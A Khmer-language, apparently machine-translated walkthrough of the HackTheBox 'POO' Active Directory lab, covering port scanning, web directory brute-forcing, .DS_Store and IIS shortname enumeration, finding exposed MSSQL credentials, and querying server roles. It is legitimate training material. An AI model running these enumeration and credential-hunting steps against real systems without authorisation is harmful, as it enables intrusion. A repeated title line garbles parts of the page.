HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž“αŸ…αž€αŸ’αž“αž»αž„αž’αžαŸ’αžαž”αž‘αž“αŸαŸ‡ αž™αžΎαž„αž“αžΉαž„αžœαž·αž—αžΆαž‚αž€αžΆαžšαž’αž“αž»αž˜αŸαžαž˜αž·αž“αžαŸ’αžšαžΉαž˜αžαŸ‚αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž”αŸ‰αž»αžŽαŸ’αžŽαŸ„αŸ‡αž‘αŸ αž”αŸ‰αž»αž“αŸ’αžαŸ‚αž‡αžΆαž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸαžαŸ’αž“αžΆαžαžαžΌαž…αž‘αžΆαŸ†αž„αž˜αžΌαž›αž–αžΈαž‚αŸαž αž‘αŸ†αž–αŸαžš HackThoBoxBoxBox.

αžŠαžΌαž…αžŠαŸ‚αž›αž”αžΆαž“αž”αž‰αŸ’αž‡αžΆαž€αŸ‹αž“αŸ…αž€αŸ’αž“αž»αž„αž€αžΆαžšαž–αž·αž–αžŽαŸŒαž“αžΆ POO αžαŸ’αžšαžΌαžœαž”αžΆαž“αžšαž…αž“αžΆαž‘αžΎαž„αžŠαžΎαž˜αŸ’αž”αžΈαžŸαžΆαž€αž›αŸ’αž”αž„αž‡αŸ†αž“αžΆαž‰αž“αŸ…αž‚αŸ’αžšαž”αŸ‹αžŠαŸ†αžŽαžΆαž€αŸ‹αž€αžΆαž›αž“αŸƒαž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž“αŸ…αž€αŸ’αž“αž»αž„αž”αžšαž·αž™αžΆαž€αžΆαžŸ Active Directory αžαžΌαž…αž˜αž½αž™αŸ” αž‚αŸ„αž›αžŠαŸ…αž‚αžΊαžŠαžΎαž˜αŸ’αž”αžΈαžŸαž˜αŸ’αžšαž”αžŸαž˜αŸ’αžšαž½αž›αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αžŠαŸ‚αž›αž˜αžΆαž“ αž”αž„αŸ’αž€αžΎαž“αžŸαž·αž‘αŸ’αž’αž· αž αžΎαž™αž‘αžΈαž”αŸ†αž•αž»αžαžŸαž˜αŸ’αžšαž”αžŸαž˜αŸ’αžšαž½αž›αžŠαŸ‚αž“αž‘αžΆαŸ†αž„αž˜αžΌαž›αžŠαŸ„αž™αž€αžΆαžšαž”αŸ’αžšαž˜αžΌαž›αž‘αž„αŸ‹αž…αŸ†αž“αž½αž“ 5 αž“αŸ…αž€αŸ’αž“αž»αž„αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαŸ”

αž€αžΆαžšαžαž—αŸ’αž‡αžΆαž”αŸ‹αž‘αŸ…αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸαž‚αžΊαžαžΆαž˜αžšαž™αŸˆ VPN αŸ” αžœαžΆαžαŸ’αžšαžΌαžœαž”αžΆαž“αžŽαŸ‚αž“αžΆαŸ†αž˜αž·αž“αž±αŸ’αž™αž—αŸ’αž‡αžΆαž”αŸ‹αž–αžΈαž€αž»αŸ†αž–αŸ’αž™αžΌαž‘αŸαžšαžŠαŸ‚αž›αž€αŸ†αž–αž»αž„αž’αŸ’αžœαžΎαž€αžΆαžš αž¬αž–αžΈαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αžŠαŸ‚αž›αž˜αžΆαž“αž‘αž·αž“αŸ’αž“αž“αŸαž™αžŸαŸ†αžαžΆαž“αŸ‹αŸ—αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž’αŸ’αž“αž€ αž“αŸ…αž–αŸαž›αž’αŸ’αž“αž€αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αž”αžŽαŸ’αžαžΆαž‰αž―αž€αž‡αž“αž‡αžΆαž˜αž½αž™αž˜αž“αž»αžŸαŸ’αžŸαžŠαŸ‚αž›αžŠαžΉαž„αž’αŸ†αž–αžΈαžŸαž»αžœαžαŸ’αžαž·αž—αžΆαž–αž–αŸαžαŸŒαž˜αžΆαž“ πŸ™‚

αž–αŸαžαŸŒαž˜αžΆαž“αž’αž„αŸ’αž‚αž€αžΆαžš
αžŠαžΌαž…αŸ’αž“αŸαŸ‡β€‹αž’αŸ’αž“αž€β€‹αž’αžΆαž…β€‹αžŸαŸ’αžœαŸ‚αž„β€‹αž™αž›αŸ‹β€‹αž’αŸ†αž–αžΈβ€‹αž’αžαŸ’αžαž”αž‘β€‹αžαŸ’αž˜αžΈ αž€αž˜αŸ’αž˜αžœαž·αž’αžΈ αž“αž·αž„β€‹αž–αŸαžαŸŒαž˜αžΆαž“β€‹αž•αŸ’αžŸαŸαž„β€‹αž‘αŸ€αž αžαŸ’αž‰αž»αŸ†β€‹αž”αžΆαž“β€‹αž”αž„αŸ’αž€αžΎαž αž†αžΆαž“αŸ‚αž› Telegram ΠΈ αž€αŸ’αžšαž»αž˜αžŠαžΎαž˜αŸ’αž”αžΈαž–αž·αž—αžΆαž€αŸ’αžŸαžΆαž”αž‰αŸ’αž αžΆαžŽαžΆαž˜αž½αž™αŸ” αž“αŸ…αž€αŸ’αž“αž»αž„αžαŸ†αž”αž“αŸ‹αž“αŸƒ IIKB αŸ” αžŸαŸ†αžŽαžΎαž•αŸ’αž‘αžΆαž›αŸ‹αžαŸ’αž›αž½αž“ αžŸαŸ†αžŽαž½αžš αžŸαŸ†αžŽαžΌαž˜αž–αžš αž“αž·αž„αž’αž“αž»αžŸαžΆαžŸαž“αŸαžšαž”αžŸαŸ‹αž’αŸ’αž“αž€αž•αž„αžŠαŸ‚αžšαŸ” αžαŸ’αž‰αž»αŸ†β€‹αž“αžΉαž„β€‹αž˜αžΎαž› αž αžΎαž™β€‹αž†αŸ’αž›αžΎαž™β€‹αž‘αŸ…β€‹αž’αŸ’αž“αž€β€‹αžšαžΆαž›αŸ‹β€‹αž‚αŸ’αž“αžΆαŸ”.

αž–αŸαžαŸŒαž˜αžΆαž“αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αžαŸ’αžšαžΌαžœαž”αžΆαž“αž•αŸ’αžαž›αŸ‹αž‡αžΌαž“αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž‚αŸ„αž›αž”αŸ†αžŽαž„αž’αž”αŸ‹αžšαŸ†αžαŸ‚αž”αŸ‰αž»αžŽαŸ’αžŽαŸ„αŸ‡αŸ” αž’αŸ’αž“αž€αž“αž·αž–αž“αŸ’αž’αž“αŸƒαž―αž€αžŸαžΆαžšαž“αŸαŸ‡αžŸαž“αŸ’αž˜αžαŸ‹αžαžΆαž˜αž·αž“αž˜αžΆαž“αž€αžΆαžšαž‘αž‘αž½αž›αžαž»αžŸαžαŸ’αžšαžΌαžœαž…αŸ†αž–αŸ„αŸ‡αž€αžΆαžšαžαžΌαž…αžαžΆαžαžŽαžΆαž˜αž½αž™αžŠαŸ‚αž›αž”αž„αŸ’αž€αž‘αžΎαž„αž…αŸ†αž–αŸ„αŸ‡αž“αžšαžŽαžΆαž˜αŸ’αž“αžΆαž€αŸ‹αžŠαŸ‚αž›αž‡αžΆαž›αž‘αŸ’αž’αž•αž›αž“αŸƒαž€αžΆαžšαž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž…αŸ†αžŽαŸαŸ‡αžŠαžΉαž„ αž“αž·αž„αžœαž·αž’αžΈαžŸαžΆαžŸαŸ’αžšαŸ’αžαžŠαŸ‚αž›αž‘αž‘αž½αž›αž”αžΆαž“αž‡αžΆαž›αž‘αŸ’αž’αž•αž›αž“αŸƒαž€αžΆαžšαžŸαž·αž€αŸ’αžŸαžΆαž―αž€αžŸαžΆαžšαž“αŸαŸ‡αŸ”

αž€αžΆαžšαžŽαŸ‚αž“αžΆαŸ†

αž αŸ’αž‚αŸαž˜αž”αž‰αŸ’αž…αž”αŸ‹αž“αŸαŸ‡αž˜αžΆαž“αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž–αžΈαžš αž“αž·αž„αž˜αžΆαž“αž‘αž„αŸ‹αž…αŸ†αž“αž½αž“ 5 αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž€αžΆαžšαž–αž·αž–αžŽαŸŒαž“αžΆ αž“αž·αž„αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“αžšαž”αžŸαŸ‹αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αžŠαŸ‚αž›αž˜αžΆαž“αžŸαŸ’αžšαžΆαž”αŸ‹αž€αŸαžαŸ’αžšαžΌαžœαž”αžΆαž“αž•αŸ’αžαž›αŸ‹αž±αŸ’αž™αž•αž„αžŠαŸ‚αžšαŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αžαŸ„αŸ‡αž…αžΆαž”αŸ‹αž•αŸ’αžαžΎαž˜!

αž‘αž„αŸ‹αž‡αžΆαžαž· Recon

αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž“αŸαŸ‡αž˜αžΆαž“αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“ IP αž“αŸƒ 10.13.38.11 αžŠαŸ‚αž›αžαŸ’αž‰αž»αŸ†αž”αž“αŸ’αžαŸ‚αž˜αž‘αŸ… /etc/hosts αŸ”
10.13.38.11 poo.htb

αž‡αŸ†αž αžΆαž“αžŠαŸ†αž”αžΌαž„αž‚αžΊαžαŸ’αžšαžΌαžœαžŸαŸ’αž€αŸαž“αž…αŸ’αžšαž€αž”αžΎαž€αŸ” αžŠαŸ„αž™αžŸαžΆαžšαžœαžΆαžαŸ’αžšαžΌαžœαž€αžΆαžšαž–αŸαž›αž™αžΌαžšαžŠαžΎαž˜αŸ’αž”αžΈαžŸαŸ’αž€αŸαž“αž…αŸ’αžšαž€αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αžŠαŸ„αž™αž”αŸ’αžšαžΎ nmap αžŠαŸ†αž”αžΌαž„αžαŸ’αž‰αž»αŸ†αž“αžΉαž„αž’αŸ’αžœαžΎαžœαžΆαž‡αžΆαž˜αž½αž™ masscan αŸ” αž™αžΎαž„αžŸαŸ’αž€αŸαž“αž…αŸ’αžšαž€ TCP αž“αž·αž„ UDP αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž–αžΈαž…αŸ†αžŽαž»αž…αž”αŸ’αžšαž‘αžΆαž€αŸ‹ tun0 αž“αŸ… 500pps αŸ”

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž₯αž‘αžΌαžœαž“αŸαŸ‡ αžŠαžΎαž˜αŸ’αž”αžΈαž‘αž‘αž½αž›αž”αžΆαž“αž–αŸαžαŸŒαž˜αžΆαž“αž›αž˜αŸ’αž’αž·αžαž”αž“αŸ’αžαŸ‚αž˜αž’αŸ†αž–αžΈαžŸαŸαžœαžΆαž€αž˜αŸ’αž˜αžŠαŸ‚αž›αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž“αŸ…αž›αžΎαž…αŸ’αžšαž€ αžŸαžΌαž˜αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαžŸαŸ’αž€αŸαž“αžŠαŸ„αž™αž”αŸ’αžšαžΎαž‡αž˜αŸ’αžšαžΎαžŸ -A αŸ”

nmap -A poo.htb -p80,1433

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αžŠαžΌαž…αŸ’αž“αŸαŸ‡αž™αžΎαž„αž˜αžΆαž“αžŸαŸαžœαžΆαž€αž˜αŸ’αž˜ IIS αž“αž·αž„ MSSQL αŸ” αž€αŸ’αž“αž»αž„αž€αžšαžŽαžΈαž“αŸαŸ‡ αž™αžΎαž„αž“αžΉαž„αžŸαŸ’αžœαŸ‚αž„αžšαž€αžˆαŸ’αž˜αŸ„αŸ‡ DNS αž–αž·αžαž”αŸ’αžšαžΆαž€αžŠαžšαž”αžŸαŸ‹ domain αž“αž·αž„αž€αž»αŸ†αž–αŸ’αž™αžΌαž‘αŸαžšαŸ” αž“αŸ…αž›αžΎαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαž‚αŸαž αž‘αŸ†αž–αŸαžš αž™αžΎαž„αžαŸ’αžšαžΌαžœαž”αžΆαž“αžŸαŸ’αžœαžΆαž‚αž˜αž“αŸαžŠαŸ„αž™αž‘αŸ†αž–αŸαžšαžŠαžΎαž˜ IIS αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž…αžΌαžšαž™αžΎαž„αžšαŸ†αž›αžΉαž€αž‘αžΎαž„αžœαž·αž‰αž“αŸ…αž›αžΎαžαžαŸ” αžαŸ’αž‰αž»αŸ†αž”αŸ’αžšαžΎ gobuster αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž€αžΆαžšαž“αŸαŸ‡αŸ” αž“αŸ…αž€αŸ’αž“αž»αž„αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžšαž™αžΎαž„αž”αž‰αŸ’αž‡αžΆαž€αŸ‹αž…αŸ†αž“αž½αž“αž“αŸƒαž€αžΆαžšαž•αŸ’αžŸαžΆαž™ 128 (-t), URL (-u), αžœαž…αž“αžΆαž“αž»αž€αŸ’αžšαž˜ (-w) αž“αž·αž„αž•αŸ’αž“αŸ‚αž€αž”αž“αŸ’αžαŸ‚αž˜αžŠαŸ‚αž›αž…αžΆαž”αŸ‹αž’αžΆαžšαž˜αŸ’αž˜αžŽαŸαž™αžΎαž„ (-x) αŸ”

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αžŠαžΌαž…αŸ’αž“αŸαŸ‡ αž™αžΎαž„αž˜αžΆαž“αž€αžΆαžšαž•αŸ’αž‘αŸ€αž„αž•αŸ’αž‘αžΆαžαŸ‹ HTTP αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αžαž /admin αž€αŸαžŠαžΌαž…αž‡αžΆαž―αž€αžŸαžΆαžšαž•αŸ’αž‘αž»αž€αžŸαŸαžœαžΆαž•αŸ’αž‘αŸƒαžαž» .DS_Store αžŠαŸ‚αž›αž˜αžΆαž“αŸ” .DS_Store αž‚αžΊαž‡αžΆαž―αž€αžŸαžΆαžšαžŠαŸ‚αž›αžšαž€αŸ’αžŸαžΆαž‘αž»αž€αž€αžΆαžšαž€αŸ†αžŽαžαŸ‹αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αžαžαž―αž€αžŸαžΆαžš αžŠαžΌαž…αž‡αžΆαž”αž‰αŸ’αž‡αžΈαž―αž€αžŸαžΆαžš αž‘αžΈαžαžΆαŸ†αž„αžšαžΌαž”αžαŸ†αžŽαžΆαž„ αžšαžΌαž”αž—αžΆαž–αž•αŸ’αž‘αŸƒαžαžΆαž„αž€αŸ’αžšαŸ„αž™αžŠαŸ‚αž›αž”αžΆαž“αž‡αŸ’αžšαžΎαžŸαžšαžΎαžŸαŸ” αž―αž€αžŸαžΆαžšαž”αŸ‚αž”αž“αŸαŸ‡αž’αžΆαž…αž”αž‰αŸ’αž…αž”αŸ‹αž“αŸ…αž€αŸ’αž“αž»αž„αžαžαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαž‚αŸαž αž‘αŸ†αž–αŸαžšαžšαž”αžŸαŸ‹αž’αŸ’αž“αž€αž’αž—αž·αžœαžŒαŸ’αžαž“αŸαž‚αŸαž αž‘αŸ†αž–αŸαžšαŸ” αžŠαžΌαž…αŸ’αž“αŸαŸ‡ αž™αžΎαž„αž‘αž‘αž½αž›αž”αžΆαž“αž–αŸαžαŸŒαž˜αžΆαž“αž’αŸ†αž–αžΈαžαŸ’αž›αžΉαž˜αžŸαžΆαžšαž“αŸƒαžαžαž―αž€αžŸαžΆαžšαŸ” αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž€αžΆαžšαž“αŸαŸ‡αž’αŸ’αž“αž€αž’αžΆαž…αž”αŸ’αžšαžΎ DS_Store crawler.

python3 dsstore_crawler.py -i http://poo.htb/

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž™αžΎαž„αž‘αž‘αž½αž›αž”αžΆαž“αž˜αžΆαžαž·αž€αžΆαž“αŸƒαžαžαŸ” αž’αŸ’αžœαžΈαžŠαŸ‚αž›αž‚αž½αžšαž±αŸ’αž™αž…αžΆαž”αŸ‹αž’αžΆαžšαž˜αŸ’αž˜αžŽαŸαž”αŸ†αž•αž»αžαž“αŸ…αž‘αžΈαž“αŸαŸ‡αž‚αžΊαžαž / dev αžŠαŸ‚αž›αž™αžΎαž„αž’αžΆαž…αž˜αžΎαž›αžƒαžΎαž‰αž”αŸ’αžšαž—αž–αž“αž·αž„αž―αž€αžŸαžΆαžš db αž‡αžΆαž–αžΈαžšαžŸαžΆαžαžΆαŸ” αž”αŸ‰αž»αž“αŸ’αžαŸ‚αž™αžΎαž„αž’αžΆαž…αž”αŸ’αžšαžΎ 6 αžαž½αž’αž€αŸ’αžŸαžšαžŠαŸ†αž”αžΌαž„αž“αŸƒαžˆαŸ’αž˜αŸ„αŸ‡αž―αž€αžŸαžΆαžš αž“αž·αž„αžαž αž”αŸ’αžšαžŸαž·αž“αž”αžΎαžŸαŸαžœαžΆαž€αž˜αŸ’αž˜αž„αžΆαž™αžšαž„αž‚αŸ’αžšαŸ„αŸ‡αžŠαŸ„αž™ IIS ShortName αŸ” αž’αŸ’αž“αž€αž’αžΆαž…αž–αž·αž“αž·αžαŸ’αž™αž˜αžΎαž›αž—αžΆαž–αž„αžΆαž™αžšαž„αž‚αŸ’αžšαŸ„αŸ‡αž“αŸαŸ‡αžŠαŸ„αž™αž”αŸ’αžšαžΎ αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αžŸαŸ’αž€αŸαž“αžˆαŸ’αž˜αŸ„αŸ‡αžαŸ’αž›αžΈ IIS.

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž αžΎαž™αž™αžΎαž„αžšαž€αžƒαžΎαž‰αž―αž€αžŸαžΆαžšαž’αžαŸ’αžαž”αž‘αž˜αž½αž™αžŠαŸ‚αž›αž…αžΆαž”αŸ‹αž•αŸ’αžαžΎαž˜αžŠαŸ„αž™ "poo_co" αŸ” αž˜αž·αž“αžŠαžΉαž„αžαžΆαžαŸ’αžšαžΌαžœαž’αŸ’αžœαžΎαž’αŸ’αžœαžΈαž”αž“αŸ’αž‘αžΆαž”αŸ‹αž‘αŸ αžαŸ’αž‰αž»αŸ†αž‚αŸ’αžšαžΆαž“αŸ‹αžαŸ‚αž‡αŸ’αžšαžΎαžŸαžšαžΎαžŸαž–αžΈαžœαž…αž“αžΆαž“αž»αž€αŸ’αžšαž˜αž“αŸƒαž”αž‰αŸ’αž‡αžΈαž–αžΆαž€αŸ’αž™αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αžŠαŸ‚αž›αž…αžΆαž”αŸ‹αž•αŸ’αžαžΎαž˜αžŠαŸ„αž™ "សហ" αŸ”

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

αž αžΎαž™αž’αŸ’αžœαžΎαž˜αŸ’αžαž„αž‘αŸ€αžαž‡αžΆαž˜αž½αž™ wfuzz αŸ”

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž αžΎαž™αžŸαŸ’αžœαŸ‚αž„αžšαž€αž–αžΆαž€αŸ’αž™αžαŸ’αžšαžΉαž˜αžαŸ’αžšαžΌαžœ! αž™αžΎαž„αž˜αžΎαž›αž―αž€αžŸαžΆαžšαž“αŸαŸ‡ αžšαž€αŸ’αžŸαžΆαž‘αž»αž€αž–αŸαžαŸŒαž˜αžΆαž“αžŸαž˜αŸ’αž„αžΆαžαŸ‹ (αžœαž·αž“αž·αž…αŸ’αž†αŸαž™αžŠαŸ„αž™αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžš DBNAME αž–αž½αž€αžœαžΆαž˜αž€αž–αžΈ MSSQL)αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž™αžΎαž„β€‹αž”αŸ’αžšαž‚αž›αŸ‹β€‹αž‘αž„αŸ‹αž‡αžΆαžαž· αž αžΎαž™β€‹αž™αžΎαž„β€‹αžˆαžΆαž“β€‹αž‘αŸ…β€‹αž˜αž»αž ្០%αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž‘αž„αŸ‹αž‡αžΆαžαž·

αž™αžΎαž„αž—αŸ’αž‡αžΆαž”αŸ‹αž‘αŸ… MSSQL αžαŸ’αž‰αž»αŸ†αž”αŸ’αžšαžΎ DBeaver αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž™αžΎαž„αž˜αž·αž“αž”αžΆαž“αžšαž€αžƒαžΎαž‰αž’αŸ’αžœαžΈαžŠαŸ‚αž›αž‚αž½αžšαž±αŸ’αž™αž…αžΆαž”αŸ‹αž’αžΆαžšαž˜αŸ’αž˜αžŽαŸαž“αŸ…αž€αŸ’αž“αž»αž„αž˜αžΌαž›αžŠαŸ’αž‹αžΆαž“αž‘αž·αž“αŸ’αž“αž“αŸαž™αž“αŸαŸ‡αž‘αŸ αž…αžΌαžšαž™αžΎαž„αž”αž„αŸ’αž€αžΎαž SQL Editor αž αžΎαž™αž–αž·αž“αž·αžαŸ’αž™αž˜αžΎαž›αžαžΆαžαžΎαž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž‡αžΆαž’αŸ’αžœαžΈαŸ”

SELECT name FROM master..syslogins;

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž™αžΎαž„αž˜αžΆαž“αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž–αžΈαžšαž“αžΆαž€αŸ‹αŸ” αžŸαžΌαž˜β€‹αž–αž·αž“αž·αžαŸ’αž™β€‹αž˜αžΎαž›β€‹αžŸαž·αž‘αŸ’αž’αž·β€‹αžšαž”αžŸαŸ‹β€‹αž™αžΎαž„αŸ”

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

